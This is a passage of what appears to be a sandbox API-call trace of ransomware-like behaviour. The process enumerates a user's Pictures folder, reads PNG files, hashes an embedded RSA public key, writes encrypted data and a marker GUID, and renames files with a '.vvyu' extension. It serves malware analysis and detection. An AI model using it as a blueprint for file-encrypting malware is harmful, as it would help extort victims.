dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0195.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cc0 [0195.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c60 [0195.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0195.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0195.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c78 [0195.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c48 [0195.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cd8 [0195.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0195.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ca8 [0195.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c90 [0195.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cf0 [0195.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c90 [0195.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0195.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0195.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c60 [0195.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea4a68 [0195.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0195.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea4c78 [0195.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0195.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0195.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea4e90 [0195.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4c78 | out: hHeap=0x620000) returned 1 [0195.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e90 | out: hHeap=0x620000) returned 1 [0195.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0195.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0195.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1338 | out: hHeap=0x620000) returned 1 [0195.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0195.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.174] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x6314, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x6314, lpOverlapped=0x0) returned 1 [0195.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.175] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x6319, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.175] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea4a68 [0195.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea4a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea4e98 [0195.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.177] WriteFile (in: hFile=0x568, lpBuffer=0x2ea4e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea4e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e98 | out: hHeap=0x620000) returned 1 [0195.177] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.177] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.178] CloseHandle (hObject=0x568) returned 1 [0195.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea4a68 [0195.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.179] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\YZcqJ4cWJ.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\yzcqj4cwj.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\YZcqJ4cWJ.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\yzcqj4cwj.png.vvyu")) returned 1 [0195.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.181] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.185] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9454bc60, ftCreationTime.dwHighDateTime=0x1d89abc, ftLastAccessTime.dwLowDateTime=0xd731c3e0, ftLastAccessTime.dwHighDateTime=0x1d8a217, ftLastWriteTime.dwLowDateTime=0xd731c3e0, ftLastWriteTime.dwHighDateTime=0x1d8a217, nFileSizeHigh=0x0, nFileSizeLow=0xc087, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZzmcSYQ7d6yY4Z.png", cAlternateFileName="ZZMCSY~1.PNG")) returned 1 [0195.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1338 [0195.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0195.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1338 | out: hHeap=0x620000) returned 1 [0195.185] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ZzmcSYQ7d6yY4Z.png") returned=".png" [0195.186] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ZzmcSYQ7d6yY4Z.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\zzmcsyq7d6yy4z.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.186] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=49287) returned 1 [0195.186] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.190] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xc061, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.190] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0195.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.194] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.194] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xc087, lpOverlapped=0x0) returned 1 [0195.195] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.195] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.195] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.195] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.196] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.197] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.197] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.197] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.197] GetLastError () returned 0x0 [0195.197] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.197] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.197] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.197] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.197] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc090) returned 0x2ea79b0 [0195.198] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1338 [0195.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c30 [0195.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c48 [0195.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c78 [0195.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cd8 [0195.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c90 [0195.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.199] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea4a68 [0195.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cd8 [0195.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0195.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c90 [0195.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2c78 [0195.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0195.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0195.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0195.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0195.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0195.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.202] GetCurrentThreadId () returned 0x66c [0195.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 